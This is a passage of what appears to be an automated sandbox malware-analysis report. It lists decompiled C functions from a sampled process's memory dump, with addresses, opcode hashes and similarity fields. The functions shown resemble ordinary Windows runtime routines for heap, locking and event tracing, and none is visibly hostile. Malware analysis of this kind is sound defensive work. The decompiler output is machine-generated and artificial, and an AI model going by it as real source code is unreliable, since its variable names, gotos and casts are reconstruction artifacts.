                                                                              0x0179a6d2
                                                                              0x0179a701
                                                                              0x0179a704
                                                                              0x00000000
                                                                              0x0179a704
                                                                              0x0179a6d4
                                                                              0x0179a6d6
                                                                              0x0179a6d9
                                                                              0x0179a6db
                                                                              0x0179a6e1
                                                                              0x0179a6e6
                                                                              0x0179a6e8
                                                                              0x0179a6e8
                                                                              0x0179a6ea
                                                                              0x00000000
                                                                              0x0179a6ea
                                                                              0x0179a688
                                                                              0x0179a692
                                                                              0x0179a694
                                                                              0x0179a699
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179a69d
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f218e1bf4228cff3fc85311553562724dc865c973854aa3ffd7d1ac32f7c584f
                                                                              • Instruction ID: b07c192cdde8096ffb10058978345c3aa70ccffd441865d78daea64057376eed
                                                                              • Opcode Fuzzy Hash: f218e1bf4228cff3fc85311553562724dc865c973854aa3ffd7d1ac32f7c584f
                                                                              • Instruction Fuzzy Hash: 014157B5A01219DFCF15CF58D890B99FBF1FB89304F1980A9EA09AB345C779A901CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178C182 Relevance: .1, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E0178C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01787D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01838D34(_v8, _t80);
					}
					E01782280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0177FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01838833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0177FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E017AB180();
						if(_a4 != 0) {
							E01782280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0178BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0178BB2D(_t16, _t15);
						E0178B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0177FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0177FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0177FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                              0x0178c18d
                                                                              0x0178c18f
                                                                              0x0178c191
                                                                              0x0178c19b
                                                                              0x0178c1a0
                                                                              0x0178c1d4
                                                                              0x0178c1de
                                                                              0x017d2d6e
                                                                              0x0178c1e4
                                                                              0x0178c1e4
                                                                              0x0178c1e4
                                                                              0x0178c1ec
                                                                              0x017d2d7d
                                                                              0x017d2d7d
                                                                              0x0178c1f3
                                                                              0x0178c1ff
                                                                              0x017d2d88
                                                                              0x017d2d8d
                                                                              0x017d2d94
                                                                              0x017d2d94
                                                                              0x017d2d9f
                                                                              0x017d2da4
                                                                              0x017d2dab
                                                                              0x017d2db0
                                                                              0x017d2db2
                                                                              0x017d2db3
                                                                              0x017d2db4
                                                                              0x017d2dbc
                                                                              0x017d2dc3
                                                                              0x017d2dc3
                                                                              0x0178c205
                                                                              0x0178c205
                                                                              0x0178c208
                                                                              0x0178c20e
                                                                              0x0178c211
                                                                              0x0178c216
                                                                              0x0178c219
                                                                              0x0178c21f
                                                                              0x0178c222
                                                                              0x0178c22c
                                                                              0x0178c234
                                                                              0x0178c23a
                                                                              0x0178c23f
                                                                              0x0178c245
                                                                              0x0178c24b
                                                                              0x0178c251
                                                                              0x0178c25a
                                                                              0x0178c276
                                                                              0x0178c27d
                                                                              0x0178c27d
                                                                              0x0178c25c
                                                                              0x0178c25c
                                                                              0x00000000
                                                                              0x0178c25e
                                                                              0x0178c1a4
                                                                              0x0178c1aa
                                                                              0x0178c1b3
                                                                              0x0178c265
                                                                              0x0178c26c
                                                                              0x0178c26c
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                              • Instruction ID: e0b090c1fd5cb7f56887d61f9c5829fc8d813641127b798e2cf0df86d323c2df
                                                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                              • Instruction Fuzzy Hash: 0C315A71B4558BBEDB06FBB8C484BE9FB64BF52200F08415AD51C87245DB346A46C7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E7016 Relevance: .1, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E017E7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x185d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E017E6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E017E6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01787D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E017A9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E017AB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01784620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                              0x017e7016
                                                                              0x017e701e
                                                                              0x017e702b
                                                                              0x017e7033
                                                                              0x017e7037
                                                                              0x017e703c
                                                                              0x017e703e
                                                                              0x017e7041
                                                                              0x017e7045
                                                                              0x017e704a
                                                                              0x017e7050
                                                                              0x017e7055
                                                                              0x017e705a
                                                                              0x017e7062
                                                                              0x017e7062
                                                                              0x017e705a
                                                                              0x017e7064
                                                                              0x017e7064
                                                                              0x017e7067
                                                                              0x017e7071
                                                                              0x017e7096
                                                                              0x017e709b
                                                                              0x017e70a2
                                                                              0x017e70a6
                                                                              0x017e70a7
                                                                              0x017e70ad
                                                                              0x017e70b3
                                                                              0x017e70b6
                                                                              0x017e70bb
                                                                              0x017e70c3
                                                                              0x017e70c3
                                                                              0x017e70c6
                                                                              0x017e70cd
                                                                              0x017e70dd
                                                                              0x017e70e0
                                                                              0x017e70e2
                                                                              0x017e70e2
                                                                              0x017e70ee
                                                                              0x017e7101
                                                                              0x017e70f0
                                                                              0x017e70f9
                                                                              0x017e70f9
                                                                              0x017e710a
                                                                              0x017e710e
                                                                              0x017e7112
                                                                              0x017e7117
                                                                              0x017e7118
                                                                              0x017e7118
                                                                              0x017e70bb
                                                                              0x017e711d
                                                                              0x017e7123
                                                                              0x017e7131
                                                                              0x017e7131
                                                                              0x017e7136
                                                                              0x017e713d
                                                                              0x017e713e
                                                                              0x017e713f
                                                                              0x017e714a
                                                                              0x017e714a
                                                                              0x017e7084
                                                                              0x017e7088
                                                                              0x00000000
                                                                              0x017e708e
                                                                              0x017e708e
                                                                              0x017e7092
                                                                              0x00000000
                                                                              0x017e7092

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de8d26e70bf265d09589fca5c494a4964dbf7430f95d83e009193bdd84af76e1
                                                                              • Instruction ID: b356eae3b7dade07d2194e1b37040c50aba3d7f2d497a9a154aed2827aa90827
                                                                              • Opcode Fuzzy Hash: de8d26e70bf265d09589fca5c494a4964dbf7430f95d83e009193bdd84af76e1
                                                                              • Instruction Fuzzy Hash: AF31C2726047519BC324DF68C944A6AF7E9FFCC700F144A29F99587694E730E904CBE6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179A70E Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E0179A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1857b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1857b10 = 8;
					 *0x1857b14 = 0x1857b0c;
					 *0x1857b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0179A990(0x1857b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0179A840(__edx, __ecx, __ecx, _t52, 0x1857b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1857b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1857b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1857b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01784620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1857b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E017AF3E0(_t50,  *0x1857b14, _t8 >> 3);
						_t28 =  *0x1857b14; // 0x0
						__eflags = _t28 - 0x1857b0c;
						if(_t28 != 0x1857b0c) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1857b14 = _t50;
						_t48 = _v12;
						 *0x1857b10 = _t9;
						goto L6;
					}
					 *0x1857b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                              0x0179a713
                                                                              0x0179a714
                                                                              0x0179a717
                                                                              0x0179a71d
                                                                              0x0179a720
                                                                              0x0179a722
                                                                              0x0179a727
                                                                              0x0179a74a
                                                                              0x0179a754
                                                                              0x0179a75e
                                                                              0x0179a768
                                                                              0x0179a76a
                                                                              0x0179a773
                                                                              0x0179a78b
                                                                              0x0179a790
                                                                              0x0179a792
                                                                              0x0179a741
                                                                              0x0179a741
                                                                              0x0179a743
                                                                              0x0179a749
                                                                              0x0179a749
                                                                              0x0179a732
                                                                              0x0179a73a
                                                                              0x0179a797
                                                                              0x0179a79d
                                                                              0x0179a7a3
                                                                              0x0179a7a9
                                                                              0x0179a7b6
                                                                              0x0179a7bc
                                                                              0x0179a7ca
                                                                              0x0179a7e0
                                                                              0x0179a7e2
                                                                              0x0179a7e4
                                                                              0x017d9bf2
                                                                              0x00000000
                                                                              0x017d9bf2
                                                                              0x0179a7ed
                                                                              0x0179a7f2
                                                                              0x0179a800
                                                                              0x0179a805
                                                                              0x0179a80d
                                                                              0x0179a812
                                                                              0x017d9c08
                                                                              0x017d9c08
                                                                              0x0179a818
                                                                              0x0179a81b
                                                                              0x0179a821
                                                                              0x0179a824
                                                                              0x00000000
                                                                              0x0179a824
                                                                              0x0179a7ae
                                                                              0x00000000
                                                                              0x0179a7ae
                                                                              0x0179a73c
                                                                              0x0179a73e
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7d0e275d577027fffebe60325c2bce325fe42a3d292cf49c9d5b726dfd802fb
                                                                              • Instruction ID: 0db83e20843f4e7432d8eb52add40d6113ad498380e76a67499613a39149ef67
                                                                              • Opcode Fuzzy Hash: a7d0e275d577027fffebe60325c2bce325fe42a3d292cf49c9d5b726dfd802fb
                                                                              • Instruction Fuzzy Hash: F431E1B1600305DFCB21CF18E881F29BBF9FB84750F94899AE206C7244D3789A05CB93
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017961A0 Relevance: .1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E017961A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01795E50(0x17467cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01839D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0176F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                              0x017961b3
                                                                              0x017961b5
                                                                              0x017961bd
                                                                              0x017961c3
                                                                              0x017961c7
                                                                              0x017961d2
                                                                              0x017961ff
                                                                              0x017961ff
                                                                              0x01796201
                                                                              0x01796207
                                                                              0x01796207
                                                                              0x017961d4
                                                                              0x017961d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017961df
                                                                              0x017961e2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017961e6
                                                                              0x017961e8
                                                                              0x017961ee
                                                                              0x017961ee
                                                                              0x017961f9
                                                                              0x017d762f
                                                                              0x017d7632
                                                                              0x017d7635
                                                                              0x017d7639
                                                                              0x017d7640
                                                                              0x017d766e
                                                                              0x017d7675
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7681
                                                                              0x017d7689
                                                                              0x017d768d
                                                                              0x017d7691
                                                                              0x017d7695
                                                                              0x017d7699
                                                                              0x017d76af
                                                                              0x017d76b5
                                                                              0x017d76b7
                                                                              0x017d76b7
                                                                              0x017d76d7
                                                                              0x017d76dc
                                                                              0x00000000
                                                                              0x017d76dc
                                                                              0x017d76a2
                                                                              0x017d76a9
                                                                              0x017d7651
                                                                              0x017d7653
                                                                              0x017d7653
                                                                              0x017d7656
                                                                              0x017d7656
                                                                              0x00000000
                                                                              0x017d7656
                                                                              0x017d7644
                                                                              0x017d7646
                                                                              0x017d7648
                                                                              0x017d7648
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0d629a9430621151ec9cc6f1c059f7490e933b510db05e453c8df971d889766
                                                                              • Instruction ID: fd0ac8b0e6bb4f5c51cfad85fdd6398ab30fbf88c20ac314ab2a39903d2c2cb1
                                                                              • Opcode Fuzzy Hash: a0d629a9430621151ec9cc6f1c059f7490e933b510db05e453c8df971d889766
                                                                              • Instruction Fuzzy Hash: 81316BB16093018FE724CF1DC900B26FBE4FB88B04F45496DFA949B251E7B0D804CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176AA16 Relevance: .1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E0176AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x185d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1857b9c; // 0x0
					_t53 = L01784620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E017AB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E017AF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01776C59(_t53, _t51, _t58) != 0) {
							_t28 = E01795E50(0x174c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0179B230(_v32, _v28, 0x174c2d8, 1,  &_v24);
								_t28 = E0176F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                              0x0176aa25
                                                                              0x0176aa29
                                                                              0x0176aa2d
                                                                              0x0176aa30
                                                                              0x0176aa37
                                                                              0x0176aa3c
                                                                              0x017c4458
                                                                              0x017c4458
                                                                              0x017c4472
                                                                              0x017c4474
                                                                              0x017c4476
                                                                              0x0176aa64
                                                                              0x0176aa74
                                                                              0x017c447c
                                                                              0x017c4483
                                                                              0x017c4492
                                                                              0x0176aa52
                                                                              0x0176aa54
                                                                              0x0176aa5e
                                                                              0x017c44a8
                                                                              0x017c44ad
                                                                              0x017c44af
                                                                              0x017c44b6
                                                                              0x017c44b6
                                                                              0x017c44b9
                                                                              0x017c44bc
                                                                              0x017c44cd
                                                                              0x017c44d3
                                                                              0x017c44d6
                                                                              0x017c44e1
                                                                              0x017c44e1
                                                                              0x017c44e6
                                                                              0x017c44e8
                                                                              0x017c44fb
                                                                              0x017c44fb
                                                                              0x017c44e8
                                                                              0x00000000
                                                                              0x0176aa5e
                                                                              0x017c4476
                                                                              0x0176aa42
                                                                              0x0176aa46
                                                                              0x0176aa48
                                                                              0x0176aa4c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 40793c45a1e48cee5dbc2df6364fd8c3c9157665f3343560e791331b5a94762e
                                                                              • Instruction ID: 6ae49c67ea8c01fc932c684f7d824069e9a7a649fd0be22c7bd4685d15cfe5d8
                                                                              • Opcode Fuzzy Hash: 40793c45a1e48cee5dbc2df6364fd8c3c9157665f3343560e791331b5a94762e
                                                                              • Instruction Fuzzy Hash: 7131B171A0061AABCF11AF68CD51A7FF7B9EF44B00B51406EF902E7154E7749E11CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A4A2C Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E017A4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x185d360 ^ _t62;
				_v8 =  *0x185d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01782280(_t26, 0x1858608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0177FFB0(_t41, _t51, 0x1858608);
						L2:
						 *0x185b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E017AB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01782280(_t28, 0x1858608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0177FFB0(_t42, _t53, 0x1858608);
							if(_t53 != 0) {
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0177FFB0(_t41, _t51, 0x1858608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                              0x017a4a2c
                                                                              0x017a4a34
                                                                              0x017a4a3c
                                                                              0x017a4a3e
                                                                              0x017a4a48
                                                                              0x017a4a4b
                                                                              0x017a4a4d
                                                                              0x017a4a51
                                                                              0x017a4a9c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a4aa3
                                                                              0x017a4aa8
                                                                              0x017a4aad
                                                                              0x017a4ab1
                                                                              0x017a4ade
                                                                              0x017a4ae3
                                                                              0x017a4a5a
                                                                              0x017a4a62
                                                                              0x017a4a6a
                                                                              0x017a4a6e
                                                                              0x017df203
                                                                              0x017a4a84
                                                                              0x017a4a88
                                                                              0x017a4a89
                                                                              0x017a4a8a
                                                                              0x017a4a95
                                                                              0x017a4a95
                                                                              0x017a4a79
                                                                              0x017a4a80
                                                                              0x017a4af2
                                                                              0x017a4af4
                                                                              0x017a4af9
                                                                              0x017a4aff
                                                                              0x017a4b01
                                                                              0x017a4b03
                                                                              0x017a4b08
                                                                              0x017df20a
                                                                              0x017df212
                                                                              0x017df216
                                                                              0x017df216
                                                                              0x017a4b08
                                                                              0x017a4b13
                                                                              0x017a4b1a
                                                                              0x017df229
                                                                              0x017df229
                                                                              0x017a4b1a
                                                                              0x017a4a82
                                                                              0x00000000
                                                                              0x017a4a82
                                                                              0x017a4ab7
                                                                              0x017a4acd
                                                                              0x017a4acd
                                                                              0x017a4ad5
                                                                              0x017a4ada
                                                                              0x00000000
                                                                              0x017a4ada
                                                                              0x017a4ac2
                                                                              0x017a4acb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a4acb
                                                                              0x017a4a53
                                                                              0x017a4a53
                                                                              0x017a4a58
                                                                              0x00000000

                                                                              Memory Dump Source
